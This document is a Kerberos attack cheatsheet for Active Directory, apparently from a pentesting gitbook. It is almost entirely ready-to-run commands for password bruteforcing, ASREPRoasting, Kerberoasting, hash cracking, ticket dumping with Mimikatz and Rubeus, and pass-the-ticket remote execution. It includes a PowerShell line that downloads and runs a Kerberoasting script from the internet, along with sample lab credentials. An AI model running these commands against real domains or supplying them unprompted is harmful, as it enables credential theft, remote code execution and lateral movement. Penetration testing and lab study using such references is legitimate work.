Kerberos cheatsheet

Bruteforcing

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

ASREPRoast

With Impacket example GetNPUsers.py:

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
python3 GetNPUsers.py COMPANY.local/james:Password123 -request -format john -outputfile /home/ubuntu/Documents/file/dir/asrep.out -dc-ip 172.16.1.20

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

attempt with no password

python3 GetNPUsers.py COMPANY.local/james -no-pass -dc-ip 172.16.1.20

Attempt with a userlist of potentially valid users

python3 GetNPUsers.py COMPANY.local/ -usersfile /home/ubuntu/Documents/htb/dir/users.txt -format hashcat -outputfile /home/ubuntu/Documents/htb/dir/valid-users.out

With Rubeus:

# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Cracking with dictionary of passwords:

hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>

SPN Service Principal Name Overview

The structure of an SPN consists of three (3) main parts: Service Class: the service type, i.e., SQL, Web, Exchange, File, etc., and the Host where the service is usually running in the format of FQDN (Fully Qualified Domain Name)and port number.
For example, below, the Microsoft SQL service runs on the dcorp-mgmt host on port 1443.
The SPN is MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433

Kerberoasting

Great reading:
https://specterops.gitbook.io/ghostpack/rubeus/roasting

With Impacket example GetUserSPNs.py:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

📌HackTricks Tip: If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronize the host with the DC: ntpdate <IP of DC>

With Rubeus:

.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

With Powershell:

#Invoke-Kerberoast.ps1 IEX Method
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
#or load this way
Import-Module .\invoke-kerberoast.ps1
#basic command 
Invoke-Kerberoast -Domain active.htb -OutputFormat Hashcat | fl
#verbose command 
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Can also acomplish this in native powershell if you have a session

Add-Type -AssemblyName System.IdentityModelNew -ObjectSystem.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Service class\Hostname:Port"

Cracking with dictionary of passwords:

hashcat -m 13100 --force <TGSs_file> <passwords_file>

john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>

With Invoke-Mimikatz.ps1

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'

Harvest tickets from Windows

With Mimikatz:

mimikatz # sekurlsa::tickets /export

With Rubeus in Powershell:

.\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

To convert tickets between Linux/Windows format with ticket_converter.py:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

With Impacket examples:

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using ticket in Windows

Inject ticket with Mimikatz:

mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Misc

To get NTLM from password:

python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'

Tools

PreviousImpacket-install NextDomain Controllers

Last updated 1 year ago